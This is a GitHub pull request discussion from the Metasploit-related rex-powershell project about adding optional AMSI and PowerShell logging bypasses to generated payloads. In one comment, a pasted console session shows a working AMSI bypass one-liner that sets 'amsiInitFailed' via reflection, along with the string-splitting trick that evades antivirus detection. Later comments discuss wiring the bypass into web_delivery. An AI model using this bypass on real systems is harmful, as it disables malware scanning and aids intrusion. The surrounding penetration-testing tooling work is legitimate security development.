Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Integrate PowerShell Protections Bypass #17

Merged
merged 5 commits into from
Apr 22, 2019
Merged

Integrate PowerShell Protections Bypass #17

merged 5 commits into from
Apr 22, 2019

Conversation

phra
Copy link
Contributor

@phra phra commented Jan 19, 2019

@phra phra mentioned this pull request Jan 19, 2019
Closed
@phra phra changed the title Integrate psh protections bypass Integrate PowerShell Protections Bypass Jan 19, 2019
@bwatters-r7
Copy link
Contributor

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

@phra
Copy link
Contributor Author

phra commented Feb 14, 2019

@bwatters-r7 just try any powershell payloads on an updated win 10 machine with AMSI.

phra and others added 4 commits February 18, 2019 00:35
@phra
feat: add psh protections bypass to psh templates
bffb2b6
Remove intrinsic use of bypasses in psh blocks
0b532a3 
Rex::Powershell has functionality to compose PowerShell code into
Script objects using basic lexical parsing to identify functions,
variables, etc. This functionality is intended to permit/leverage
composition by consumers for maximum entropy. Concurrently, script
modifiers are in place to clean up multiline blocks, replace names,
and perform other obfuscation.

Strip out the built-in uses of the new AMSI and log bypass methods.
Remove textual cleanup to allow Rex to handle this as needed.
Implement dynamic bypass addition in payload gen
14364a7 
Passing the :prepend_protections_bypass to cmd_psh_payload will
prepend the Ruby blocks for AMSI and log bypass to the payload
text. The subsequent compression and encoding passes will perform
the same textual substitution stripping out whitespace and may
also substitute the hardcoded variable names if requested.

This approach keeps string lengths predictable while permitting
use of the evasion functionality. Not so much an issue for a full
PSH payload, but can be handy when dealing with limited space
(HID attacks, manual retyping over GUIs, etc).
@phra
Merge pull request #1 from sempervictus/feature-cleanup_psh_bypass_pr
2e14657 
Feature cleanup psh bypass pr
@phra
Copy link
Contributor Author

phra commented Apr 15, 2019

as reference: https://iwantmore.pizza/posts/amsi.html

@timwr
Copy link
Contributor

timwr commented Apr 16, 2019

Very interesting thanks @phra

@timwr
Copy link
Contributor

timwr commented Apr 22, 2019

I didn't expect the '+' to work so well:

Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>

@timwr timwr merged commit 2e14657 into rapid7:master Apr 22, 2019
timwr added a commit that referenced this pull request Apr 22, 2019
@timwr
Land #17, add optional powershell protection bypasses
ead516c
@timwr
Copy link
Contributor

timwr commented Apr 22, 2019

Thanks @phra
We still need to add this to webdelivery (preferably as an off-by-default option).
It would be nice to have the strings obfuscated dynamically, but this will do for now.

@phra
Copy link
Contributor Author

phra commented Apr 23, 2019
edited
Loading

I didn't expect the '+' to work so well:

image

It would be nice to have the strings obfuscated dynamically, but this will do for now.

empire includes https://github.com/danielbohannon/Invoke-Obfuscation but depends on PowerShell and that means adding it as optional? dependency or embedding it directly within the project with a ~50mb overhead of stuff.

writing a simpler, similar project in ruby may be an overkill.

any idea?

@0xVIC
Copy link

0xVIC commented Apr 23, 2019

Another reference

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

@phra phra deleted the feat/psh-protections-bypass branch April 23, 2019 23:40
@phra
Copy link
Contributor Author

phra commented May 1, 2019

was prepend_protections_bypass option defined somewhere?

i don't see the setting available yet with Framework Version: 5.0.19-dev.

@timwr
Copy link
Contributor

timwr commented May 10, 2019

@phra apologies I didn't send a PR with that part, I think I tested with this commit: timwr/metasploit-framework@a0d6bcd

@phra
Copy link
Contributor Author

phra commented May 10, 2019

oh ok, i hope it will be merged into master soon!
regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as target.

@phra
Copy link
Contributor Author

phra commented Jul 21, 2019
edited
Loading

any update? i still cannot easily add the amsi bypass to powershell payloads.

@phra
Copy link
Contributor Author

phra commented Oct 10, 2019

@timwr any update on this?

@timwr
Copy link
Contributor

timwr commented Oct 11, 2019

@phra did you test the commit I posted above? timwr/metasploit-framework@a0d6bcd
maybe you can send a PR to the framework repository that enables it for web_delivery?

phra added a commit to phra/metasploit-framework that referenced this pull request Oct 12, 2019
@phra
Add support for AMSI/SBL bypass to PSH web_delivery
a330fea 
Related to rapid7/rex-powershell#17
phra added a commit to phra/metasploit-framework that referenced this pull request Oct 12, 2019
@phra
Add support for AMSI/SBL bypass to PSH web_delivery
16a85f2 
Related to rapid7/rex-powershell#17
@phra phra mentioned this pull request Oct 12, 2019
Merged
7 tasks
@phra
Copy link
Contributor Author

phra commented Oct 12, 2019

maybe you can send a PR to the framework repository that enables it for web_delivery?

@timwr see rapid7/metasploit-framework#12446

This pull request was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Integrate PowerShell Security Bypasses into web_delivery
4 participants
@phra @bwatters-r7 @timwr @0xVIC